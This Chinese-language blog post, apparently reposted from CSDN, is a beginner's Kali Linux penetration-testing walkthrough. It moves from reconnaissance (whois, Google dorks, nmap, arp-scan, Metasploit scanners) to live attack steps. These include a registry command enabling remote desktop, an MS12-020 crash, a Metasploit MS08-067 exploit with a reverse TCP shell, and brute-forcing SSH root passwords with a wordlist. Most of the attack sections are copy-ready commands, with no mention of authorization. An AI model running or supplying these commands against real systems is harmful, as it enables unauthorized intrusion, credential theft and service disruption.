Kali Linux入门第二课 | 一次简单的渗透笔记

下面是最近的一次简单的渗透攻击具体思路,涉及到2个系统服务攻击,记住一步一步的看,虽然很多人都像我一样对直接入侵电脑感兴趣,但是他的前期是枯燥无味,不过一定要一步一步的看完,因为通往权限的路,很艰难。MS12这个漏洞呢你可以通过msfconsole来进
行渗透,我就说折磨多了,你们自己看吧,虽然不是教程不过很详细,很容易懂。QQ:1099718640不懂得来问我
此教程仅为菜鸟,小白,入门提供,大鸟请飞走。
。。。。。。
攻击前期   信息收集
攻击中     利用漏洞
攻击后     后渗透攻击




网络踩点  ip踩点
whois域名注册信息查询
whois 域名    testfire.net
nslookup与dig域名查询
查询服务器上的cache非权威
终端输入nslookup
进入后set type=A 
域名输入
exit退出
dig查询      可以指定具体的服务器查询
dig ip 域名
IP2location地理位置查询
www.maxmind.com 国外
www.cz88.net   国内
www.cnwzml.com 国内
netcraft实现信息查询服务
searchdns.netcraft.com
www.cnwzml.com
ip2Domain反查域名
www.7c.com
www.cnwzml.com
ip-address.com




网络踩点 搜索引擎
谷歌语法
parent directory site:域名
sete:域名 filetype:xls     xls为格式
搜索email地址
msf    use auxiliary/gather/search_email_collector




扩普路径踩点
traceroute  域名
tcptraceroute 域名




主机扫描    找出活跃主机
ping ip    太简单
ping -c 表示数量
ping -s 表述数据包大小
arping    别躲了  ,必有
arping ip
在arp的基础上加入网段扫描
arp-scan --interface=eth2 这是网卡 ip/24
nbtscan     扫描
nbtscan ip/24
nmap 最强工具,不解释
nmap ip
nmap -sn ip/24   加sn不做端口
nmap ip/24
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加   详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息
msfconsole扫描主机
msfconsole进入
msf   use auxiliary/scanner/discovery/arp_sweep   调用主机扫描模块
msf   auxiliary(arp_sweep)>show options
msf   set options
msf   set RHOSTS ip
msf   set SMAC 那个网段
msf   set INTERFADE eth2
ip-ip
msf   set THREADs 10    线程
msf   run    执行




系统扫描
xprobe2 ip
nmap -O ip




端口扫描
metaspolit端口扫描
块不容易被发现
msf use auxiliary/scanner/portscan/syn    端口扫描模块
msf set RHOSTS ip
msf set THREADS 20 线程数
run执行
back 退出
Nmap 端口服务系统探测
nmap -sS -Pn ip 能扫描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加   详细
nmap -sV ip 能扫描到ip,端口,信息,操作
nmap -A ip 所有信息




漏洞扫描附带渗透攻击全程
MS12-020系统高危漏洞
一般开启3389端口的xp和server 2003都有
DOS开启windows server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
蓝屏
MS08-067系统高危漏洞的渗透
msf  search ms08_067
msf use exploit/windows/smb/ms08_067_netapi   调用ms08渗透攻击模块
msf show payloads    查看载荷
msf set payloads generic/shell_reverse_tcp
msf RHOST ip  设置目标ip
msf set LHOST ip 设置本地ip
msf set LPORT 5000本地端口
msf set target 5 设置目标系统操作代码为5,这里指windows server 2003
msf show options  再次检查渗透攻击参数
msf exploit 执行渗透
拿到shell   成功渗透
后面是后渗透攻击小部分






Telnet网络查点
用户账户名:口令猜测破解
错误配置的共享资源 恶意程序上传
老旧版本的网络服务版本 缓冲区于出漏洞攻击
nmap -sV ip
msf use auxiliary/scanner/telnet/telnet_version   调用模块
msf set RHOSTS ip/24
msf set THREADS 100  设置线程
msf run
telnet ip




SSH口令破解


msf use auxiliary/scanner/ssh/ssh_login    调用模块
msf set RHOSTS ip
msf set USERNAME root 账户
msf set PASS_FILE/root/wonds.txt  设置目录
msf set THPEADS 50 设置线程
msf run
Nessus
就是折磨简单,不过这只是渗透的一部分,由于本人技术原因,也就只能写到这了,后渗透攻击,和一些其他的渗透系统攻击之类的本人还并不会,
   









发布了51 篇原创文章 · 获赞 56 · 访问量 9万+

猜你喜欢

转载自blog.csdn.net/dyboy2017/article/details/78060539